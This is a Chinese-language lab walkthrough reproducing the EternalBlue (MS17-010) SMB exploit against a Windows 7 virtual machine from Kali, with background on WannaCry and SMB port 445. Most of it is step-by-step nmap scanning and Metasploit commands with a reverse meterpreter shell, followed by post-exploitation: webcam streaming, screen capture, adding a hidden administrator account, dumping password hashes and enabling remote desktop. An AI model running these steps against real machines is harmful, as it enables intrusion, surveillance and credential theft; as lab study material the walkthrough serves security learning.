1. 全栈程序员必看首页

永恒之蓝漏洞复现(MS17010)

全栈程序员-站长 未分类 阅读 54

永恒之蓝漏洞复现(MS17010)永恒之蓝实验(MS17010)1.概念永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒。恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。2.什么是ARTA

大家好,又见面了,我是你们的朋友全栈君。

永恒之蓝实验(MS17010)

1.概念

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒。恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

2.什么是ART

APT(Advanced Persistent Threat):高级持续威胁,主要特点是利用手段高,攻击持续,高危害。 APT攻击的一般规律: 1)高度目的性 2)高度隐蔽性 3)高度危害性 4)目标实体化 5)极强的持续性 。一个APT是有一套隐匿和持续攻击的框架的,往往针对特定的实体由一人或多人策划(一般是多人)。

3.445端口作用

SMB(server message blick) 是windows协议族,用于文件和打印共享服务。

NBT(netbios over TCP/IP)使用137.138(UDP)和139(TCP来实现基于TCP/IP的netbiso网络互联)

在windows中,SMB服务除了基于NBT的实现,还有直接通过445端口实现。当windows(允许NBT)作为客户端来连接SMB服务器时,它会同时尝试连接139和445端口,如果445端口有响应,那么就发送RST包给139端口看看开连接,以445端口通信来继续,当445端口无响应时,才使用139端口。

4.实验过程

环境

kali攻击主机一台、window 7

工具:kali自带的Nmap及MSF攻击框架(metasploit)

namp重要常⽤参数含义

-sP ping 扫描(不进⾏端⼝扫描)
-P0 ⽆ping 扫描
-p 指定端⼝扫描
-sT TCP 全连接扫描
-sS SYN 半连接扫描
-sF FIN 扫描
-sN Null 扫描
-sX Xmas 扫描
-O 测探⽬标主机版本
-sV 显示服务的详细版本
-A 全⾯扫描
-oN 将扫描结果保存成txt 格式
-oX 将扫描结果保存成xml 格式
-T1,-T2,-T3,-T4,-T5 扫描速度

步骤

(1)主机发现—利用nmap扫描发现攻击 nmap -n -sS 192.168.6.0/24

​ 进一步端口发现—指定端口扫描 nmap -n -p445 192.168.6.0/24 –open

​ 漏洞发现—探测是否存在已知漏洞 nmap -O -sV 192.168.6.134 -script=vuln(win7ip)

(2)开启metaspolit: msfconsole

+++选择攻击模块====>use exploit/windows/smb/ms17_010_eternalblue

+++选择有效payload====>set payload windows/meterpreter/reverse_tcp (32位)

+++选择有效payload====> set payload windows/x64/meterpreter/reverse_tcp (64位)

+++设置本地攻击主机=====>set LHOST 192.168.6.128

+++设置远程目标主机=====>set RHOST 192.168.6.134

+++设置本地侦听接口====>set LPORT 5555

+++开始攻击====>run

+++攻击成功,获得回连!!
在这里插入图片描述
在这里插入图片描述

(3)全面控制

开启摄像头 webcam_stream

截取屏幕 screenshot

屏幕监控 run vnc (若对方电脑上有安全软件会不稳定或者失败)

建用户并添加到管理员组中,然后查看创建的用户权限

net user test test123 /add

net localgroup administrators test /add 

进入对方 shell 

下载文件 download filepath 

上传文件 upload 本机path 对方path 

获得密码 hashdump 

开启3389远程桌面 run post/windows/manage/enable_rdp

kali 远程windows桌面  rdesktop -x test 192.168.88.134
  • 乱码解决在靶机的命令行界面:执行命令 chcp 65001 切换编码字符,然后执行命令显示正常。

(4)监控屏幕

#用于屏幕监控 启动攻击exploit

1:set payload windows/x64/vncinject/bind_tcp
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/134199.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • sklearn.metrics.auc_auc值计算公式

    sklearn.metrics.auc_auc值计算公式

    sklearn.metrics.auc_auc值计算公式fromsklearnimportcross_validation,metricsfromsklearnimportsvmtrain_data,train_target=load(filename)#自定义加载数据函数,返回的是训练数据的数据项和标签项train_x,test_x,train_y,test_y=cross_validation.train_test_split

    全栈程序员-站长的头像 全栈程序员-站长
    2022年10月7日
    2
  • 0x00000000代码电脑蓝屏的原因_计算机0x是什么意思

    0x00000000代码电脑蓝屏的原因_计算机0x是什么意思

    0x00000000代码电脑蓝屏的原因_计算机0x是什么意思在我们平时工作使用电脑的过程中难免会遇到各种各样的问题,有些电脑的故障,可以轻松解决,而有些问题就连重装系统都不一定解决的了,例如电脑蓝屏,而电脑蓝屏代码0x000000BE又是怎么回事呢?又该怎么解决呢?莫慌,小编这就将解决电脑蓝屏代码0x000000BE的方法告诉大家。相信遇到过蓝屏的用户都知道,当蓝屏出现时,Windows操作系统的蓝屏死机提示已经成为标志性的画面,大部分是系统崩溃的现象,令…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年10月8日
    3
  • 一致性哈希算法实现(一致性哈希与哈希的异同)

    一致性哈希算法实现(一致性哈希与哈希的异同)

    1、使用哈希算法有什么问题?假设有一个由A、B、C三个节点组成的KV服务,每个节点存放不同的KV数据。通过哈希算法,每个key都可以寻址到对应的服务器,比如,查询key是key-01,计算公式为hash(key-01)%3,经过计算寻址到了编号为1的服务器节点A但如果服务器数量发生变化,基于新的服务器数量来执行哈希算法的时候,就会出现路由寻址失败的情况,Proxy无法找到之前寻址到的那个服务器节点假如3个节点不能满足业务需求了,这时增加了一个节点,节点的数量从3变化为4,那么之前的hash(key

    全栈程序员-站长的头像 全栈程序员-站长
    2022年4月14日
    44
  • win10键锁定计算机,win10系统创建一键锁定计算机的快捷方式的操作方法

    win10键锁定计算机,win10系统创建一键锁定计算机的快捷方式的操作方法

    win10键锁定计算机,win10系统创建一键锁定计算机的快捷方式的操作方法win10系统创建一键锁定计算机的快捷方式的操作方法?很多win10用户在使用电脑的时候,会发现win10系统创建一键锁定计算机的快捷方式的的现象,根据小编的调查并不是所有的朋友都知道win10系统创建一键锁定计算机的快捷方式的的问题怎么解决,不会的朋友也不用担心,下面我就给大家讲解一下win10系统创建一键锁定计算机的快捷方式的的少许解决办法,其实步骤很简单,只需要1、首先在桌面上的空白处鼠标右…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月21日
    20
  • java版我的世界下载_我的世界java版

    java版我的世界下载_我的世界java版

    java版我的世界下载_我的世界java版我的世界java版这个所谓的java版可能大家不是很熟悉,java版就是《我的世界》是整个游戏的初始版本,目前Java版本是全平台游戏版本中内容最多,更新速度最快的版本。此外,Java版本拥有大规模的全球玩家社区,得益于它可拓展的特性,拥有百万件玩家创意作品,这些都使得Java版本是核心玩家最喜爱的版本之一。我的世界java版手机版种子:出生点前有丛林神庙的地图种子在这个种子地图上,你会出生在一座…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年7月8日
    35
  • Flume和Kafka的组合使用

    Flume和Kafka的组合使用

    Flume和Kafka的组合使用在Windows系统中打开第1个cmd窗口,执行如下命令启动Zookeeper服务:cdC:\zookeeper\apache-zookeeper-3.7.1-bin.\bin\zkServer.cmd打开第2个cmd窗口,然后执行下面命令启动Kafka服务:cdC:\kafka_2.12-2.4.0\kafka_2.12-2.4.0.\bin\windows\kafka-server-start.bat.\config\server.properties打开第.

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月23日
    22

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号